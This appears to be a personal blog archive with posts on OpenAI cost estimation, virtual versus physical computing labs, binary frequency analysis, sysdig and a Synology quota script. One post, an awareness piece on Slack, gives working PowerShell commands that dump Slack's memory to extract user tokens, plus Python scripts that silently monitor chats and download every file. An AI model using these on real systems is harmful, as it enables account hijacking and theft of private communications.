Category Archives: Uncategorized

Grant preparation – Estimating pricing for OpenAI

Prompt Tokens in and Completion Tokens out is the best estimator to help determine a cap on the cost of interacting with the model


Example

You are using OpenAI to conduct zero-shot sentiment analysis on a dataset containing customer interactions. Something like what was done here: https://doi.org/10.1016/j.mlwa.2023.100508


Prompt Tokens

Say each row in your dataset consisted of text with a length of about ~200 words.

Words to tokens are not 1:1 but we can round up to 200 Tokens, which will help account for the entire prompt.

If you want to get more accurate, you can tokenize the data here: https://platform.openai.com/tokenizer


Completion Tokens

You want the model to return a paragraph containing a sentiment result along with an explanation of reasoning and some of the keywords associated with the sentiment.

On average, this result could be 150 words (approx. 150 tokens)

Tokenizing 200 words for Input using GPT-4 8K costs ~$0.006

Generating 150 words as Output using GPT-4 8K costs ~$0.009

These prices change as OpenAI updates their models and pricing. For the most up to date pricing, please see the following page: https://openai.com/api/pricing


Cap on Expenses

In this example, a cap of $500 would allow you to perform ~33,333 queries.

Round down to account for testing, prompt engineering and other learning curves say possibly 30,000 queries.

If your dataset was less than 30,000 rows, then a cap of $500 makes sense.

Virtual versus physical educational computing environments: A nuanced analysis

Listen to this post – audio generated by https://www.wondercraft.ai

In the ever-evolving landscape of IT resources in higher education, colleges are increasingly gravitating towards virtual environments and BYOPC as a means of delivering more valuable educational experiences. While these approaches effectively address two key characteristics of educational computing resources, they also introduce new challenges in two other crucial areas. It seems clear that the search for the perfect computing environment remains elusive, as both virtual and physical setups possess unique advantages and drawbacks.

Consistency, the first characteristic we explore, is vital when catering to a diverse student body. Both virtual and physical labs offer the advantage of centralized management, enabling faculty to ensure uniform software and computing resources across platforms. However, virtual environments are somewhat vulnerable to consistency issues due to their reliance on network performance. Factors such as wireless disruptions, home network limitations, and the end user’s device performance can impede the seamless consistency that physical labs inherently possess.

Moving on to control, we encounter an interesting dichotomy. Physical lab spaces lend themselves well to tight control during testing and evaluations, providing an environment with stringent oversight. In contrast, virtual labs empower students with access to a consistent set of resources, granting a high level of control within the virtual realm. Yet, when it comes to managing and controlling BYOPC endpoints, virtual environments introduce a host of challenges that must be tackled.

Accessibility, the third characteristic under scrutiny, is an area where virtual labs shine. Students can tap into resources anytime, from anywhere, thanks to the inherent accessibility of virtual setups. Additionally, the ability to accommodate multiple users simultaneously resolves the issue of resource utilization that often plagues physical labs, where empty seats restrict access to computing resources.

Lastly, scalability enters the equation. Virtual labs provide the flexibility to scale resources and seat counts effortlessly, unencumbered by physical space limitations. On the other hand, physical labs present difficulties in allocating and managing space, making it arduous to expand capacity as needs evolve. Moreover, the cost and inefficiency associated with scaling out specialized computing resources, such as large data storage or GPU compute, within a physical space make virtual environments a more appealing choice.

By carefully examining these characteristics, educators and administrators can make informed decisions when devising support plans for curriculum demands. Let’s consider a few examples to illustrate this approach:

Suppose all undergraduates require access to a core set of software, necessitating accessibility, scalability, and consistency. In this case, a virtual environment emerges as the most suitable solution.

Alternatively, when a course demands a computing environment specifically tailored for testing and exams, control, consistency, and accessibility become paramount. Here, a physical environment would likely be the optimal choice.

These examples offer a glimpse into the practical application of the characteristic-based analysis. However, to fully navigate the complexities of educational computing environments, it is crucial to delve deeper into the specific project requirements. For instance, in the context of an expanding college curriculum featuring data and compute-intensive coursework, we can pose pertinent questions aligned with the identified characteristics:

Consistency/Accessibility:

  • Is this intended for in-class work or homework?
  • Which specific courses will make use of this computing environment?

Control:

  • Are students expected to utilize this environment for testing and evaluation purposes?

Scalability:

  • How many students will be utilizing this environment in the first year?
  • What are the precise computing requirements?
  • Can we anticipate an increase in demand over time?

By considering these aspects and leveraging the comprehensive understanding gleaned from examining the characteristic framework, educational institutions can make more informed decisions when navigating the intricate landscape of virtual and physical computing environments.

Four characteristics to compare virtual and physical computing

Comparing Virtual and Physical educational computing environments using four main characteristics.

As colleges look to deliver more valuable IT resources, there is a trend to transition to virtual environments and BYOPC. I have found that while this addresses two common characteristics of educational computing resources, it introduces new challenges in two other areas. Bottom line, there is no perfect computing environment. The virtual desktop holds great value but there seems to remain a need for at least some physical computing space.

Consistent
Consistency is important when delivering services to a broad set of students. Both virtual and physical labs allow software and computing resources to be managed centrally. Faculty can rely on all students having similar experiences across all computing platforms when it comes to resource allocation. However, the virtual environment can suffer in consistency as it relies on network performance. Wireless disruptions, home or apartment networks, and the performance of the end user’s device are just some factors of consistency.

Controlled
An environment can be consistent and still be uncontrolled. A physical lab space can be tightly controlled during testing and evaluations. In a virtual lab, students have access to a consistent set of software and computing resources. A virtual environment, on its own, can be highly controlled. But as a resource it introduces a variety of challenges when there is a need to manage and control a BYOPC endpoint.

Accessible
Virtual Labs are highly accessible and enable students to use resources at any time and from anywhere. They also allow for concurrency, solving a utilization problem. Physical labs being used for teaching often have empty seats, further restricting students from accessing computing resources.

Scalable
Virtual labs allow for scaling of resources as well as scaling seat counts. Without being constrained by physical space requirements, you can increase your virtual environment essentially at will. Physical labs are much harder to allocate and manage space. Specialized computing resources such as large data storage or GPU compute can be cost-prohibitive and ineffecient when scaled out in a physical space.

If we examine both options we can make better decisions when planning support for curriculum demands

Virtual – Moderately consistent, Moderately controlled, Highly accessible, Highly scalable

Physical – Highly consistent, Highly controlled, Fairly accessible, Barely scalable

We can use these characteristics to match project needs

Example: All undergraduates need access to a core set of software. (Must be Accessible, Must be Scalable, Must be Consistent). A virtual environment makes the most sense

Example: A course needs a computing environment for testing and exams (Must be Controlled, Must be Consistent, Must be Accessible). A physical environment makes the most sense

A more realistic example is something like the following:

The college curriculum is introducing more data and compute intensive coursework.

Using the characteristics above we can start asking questions such as:

Consistent/Accessible

  • Is this in class work or homework?
  • What specific courses will be using this?

Controlled

  • Will students be expected to use this environment for testing and evaluation?

Scalable

  • How many students will be using this in the first year?
  • What are the actual computing requirements?
  • Will this increase over time?

Beware an Attack on Slack

Slack is continuing to grow in popularity and is being adopted into industries across the globe as a tool to collaborate and communicate. I wanted to raise awareness of Slack as an attack vector and demo one of the security issues for companies using this tool in their environment. Users do not always just run Slack at work, many use it at home, or in less secure environments. Not all users are security conscious and obtaining access to one user’s system could provide an attacker with silent visibility into your operations.

How Slack authentication works

Slack authentication is handled by tokens. Most often, these tokens are requested through the API page and are used by bots, scripts, and other applications. Slack even provides a full page on the security considerations surrounding tokens and suggestions for securing them. https://api.slack.com/docs/oauth-safety. However, when you sign into the Slack application you are also assigned a token. This becomes a security consideration because since Slack is running in the context of the user and stores tokens plaintext in memory. These user tokens remain persistent for the entire login session. Tokens ARE revoked when a user explicitly signs out of the application. However, closing the browser window does not revoke the token and few users close their messaging application. Another issue is that when signing into Slack “keep me signed in” is checked by default which helps extends the life of tokens.

Slack has instituted 2FA to help protect your account but that only protects your sign-in, once your token has been collected it can be used without any additional authentication.

Why is this a security risk and how can it be exploited?

This is not a bug or a vulnerability. This is an attack vector that needs to be considered when using Slack for confidential communications.

The main issue with Slack using and storing authentication tokens in its memory is because a user-mode application can pull that data out and use it to impersonate the user.

We are going to look at the Slack binary application on Windows as an example.

We are going to take advantage of the PowerShell function Out-Minidump developed by Matthew Graeber in order to dump the memory of the Slack Process. https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1

#Source the Minidump script
. .\Out-Minidump.ps1
#pass the slack process(es) to Minidump
Get-Process slack | Out-Minidump
#parse the memory dumps looking for the pattern “xoxs-” and return the first result
Select-String .\slack* -Pattern xoxs- -List

You will see that the prior commands return a user token with the xoxs- prefix.

This same technique can be used against Slack in the Chrome and Firefox browsers by changing the process name. Once a token has been collected it can be used to interact with Slack with all the same privileges as the user. User Tokens are not tied to devices, endpoints, or IP addresses. This means that a threat actor can monitor Slack communications from anywhere once the token has been obtained.

How can a token be used?

As an example you can use it with tools such as the python slack client https://github.com/slackhq/python-slackclient

When your token has been compromised it can be used to monitor conversations or even pull all channel history.

import time
from slackclient import SlackClient

#This script will silently monitor user communications
token = "xoxs-123456789000”
sc = SlackClient(token)
if sc.rtm_connect():
    while True:
        print sc.rtm_read()
        time.sleep(1)
else:
    print "Connection Failed, invalid token?"

The simple python script below, will list all the files associated with a site, generate a public URL for each of them, and download them. A simple way for a malicious user to quietly siphon all your data.

import time
import json
import urllib
import requests

from slackclient import SlackClient

token = "xoxs-123456789000"
sc = SlackClient(token)
fileSave = urllib.URLopener()

post_data = {}
post_data['token'] = token

if sc.rtm_connect():
    fileList = json.loads(sc.server.api_call("files.list"))['files']
    for x in fileList:
        post_data['file'] = x['id']
        #had to build this call myself because of how slackrequest.py handles the word "file" in post_data
        fileInfo = (requests.post("https://slack.com/api/files.sharedPublicURL", data=post_data)).json()['file']
        pub_secret = fileInfo['permalink_public'][-10:]
        downloadURL = fileInfo['url_private_download'] + "?pub_secret=" + pub_secret
        fileSave.retrieve(downloadURL, fileInfo['name'])
else:
    print "Connection Failed, invalid token?"

Suggestions to improve security:

If you are worried your tokens might have been compromised, you can force new ones to be generated by signing out of all your devices. Go to your account settings page and at the bottom of the page click “Sign out all other sessions”

User education is necessary to ensure that your team communication and collaboration remains secure. Do you trust that that every team member has secured their home computer? One team member with a compromised token can lead to exfiltration of your entire team’s communications and files.

  • Be conscious of what files and information you share on Slack.
  • Request that users logout when not using Slack.
  • Uncheck “Keep me signed in” by default.

Frequency Analysis of Binary Executables

A set of posts by Mark Bagget on the SANS ISC page spoke about using frequency analysis for detection of DNS names and BASE 64 encoded data. This started me thinking about what else could be learned by using frequency analysis. I settled on using Marks python code to see about identifying executable files.

Importing Marks original code I can write a simple script that will allow me to pass it a binary file.

fc = FreqCounter()
fc.ignorecase = True
fc.ignorechars = ""
fc.tally_str(open(freq_file).read())

With a binary file serving to build my frequency table I can loop through a directory of files and find scores for each one.
I first created a dictionary to hold my filename and score information, this way I can evaluate the results.

score_data = {}

path = directory
files=glob.glob(path)
for file in files:
if os.path.isfile(file):
print file
f = open(file, 'read')
score = fc.probability(f.read())
f.close()
print score
score_data[file] = score

Now to fill a directory with random executables, excel spreasdsheets, pdfs, and images.
For this test I decided to throw both PE and MACH-O file formats into the directory to see what would happen

For the frequency map I decided to use Explorer.exe. I assumed that this would help to build a pretty comprehensive map that would (hopefully) be representative of a binary executable.

For analysis of the results I am simply writing the data out to a csv to allow for graphing and sorting.

#write our results out to a csv
with open(out_file,'wb') as f:
w = csv.writer(f)
w.writerows(score_data.items())

Allright, before we get to the results I noticed that this processing was taking a long time. Reading each file concurrently is not efficient so I did a little refactoring to take into account multiprocessing.

#Get list of files
files = [ join(path,f) for f in listdir(path) if isfile(join(path,f)) ]

def compute_probability(filename):
f = open(filename, 'read')
score = fc.probability(f.read())
f.close()
return filename, score

#multiprocess our frequency comparison
pool = mp.Pool(processes=4)
score_data = dict(pool.map(compute_probability,files))

Previous execution time: 382.1 Seconds
Multiprocessing execution time: 164.9 Seconds

Now that we made execution MUCH faster we can start looking at the results.
Screen Shot 2015-07-10 at 4.44.42 PM

The image is a little hard to see so I have embedded a snippet of the results below. Interestingly enough the probability based frequency analysis rated executables (PE and MACH-O), dlls, and dylibs fairly high. One anomalous excel spreadsheet starts to break the streak with a probability of 11.

Screen Shot 2015-07-10 at 4.54.32 PM
After that the results start to intermingle with dylibs falling in probability (Yes I realize when I grabbed a random assortment of libraries I copied the linked files thus creating duplicates).

These results also show that images and PDFS were NOT likely to be an executable file. So just for fun I decided to see if we could use frequency analysis to find images. I added some pngs and bmps into our directory and used a random png file as my frequency map.

I won’t bore you with the results but nothing in the test came back with a probability higher than 3. And a png did not show up until the 51st result. Images are not necessarily structured data so I was not surprised by these results.

Fun to experiment with frequency analysis feel free to check out the full code on my github, and Marks frequency code.

Multiple instances of sysdig

With the newest release of sysdig 0.1.99 you now have the option to run multiple concurrent instances of sysdig

As a beta user of sysdig cloud, this is fantastic news. I now have the option to manually capture traces on the local machines without having to stop the cloud monitoring agent.

To configure sysdig for multiple connections

create a new file

sudo vim /etc/modprobe.d/sysdig_probe.conf

Add the following lines

options sysdig_probe max_consumers = 5

Stop the sysdigcloud agent which will unload the sysdig module

service dragent stop
service dragent start

You will now have the ability to run multiple instances of sysdig while monitoring using sysdigcloud

Synology script – set quota for users in an AD group

Quick post, to support some of our VDI efforts we have utilized a Synology NAS to provide home folders for users. It works fairly well, but the Synology utilities are not very granular when it comes to managing multiple users. One distinct issue we ran into was trying to manage the different quotas for specific groups
Below is a simple bash script that takes an Active Directory group as an argument.
When run it sets a disk quota for all the users in that group

Edit the DOMAIN portion and the current “10G” quota to meet your needs

if [ $1 ]

then

for users in $(wbinfo --group-info DOMAIN\\$1 | sed -n -e 's/^.*\://;s/,/\n/gp')

do

if [ "$(synoquota --get $users /dev/vg1000/lv | sed -n 's/\[//;s/\]//;s/^[ \t]*//;s/Quota = //p')" = "0.00 KB" ]

then

synoquota --set $users 1 10G

fi

done

else

echo "USAGE: setquoatas.sh groupname"

fi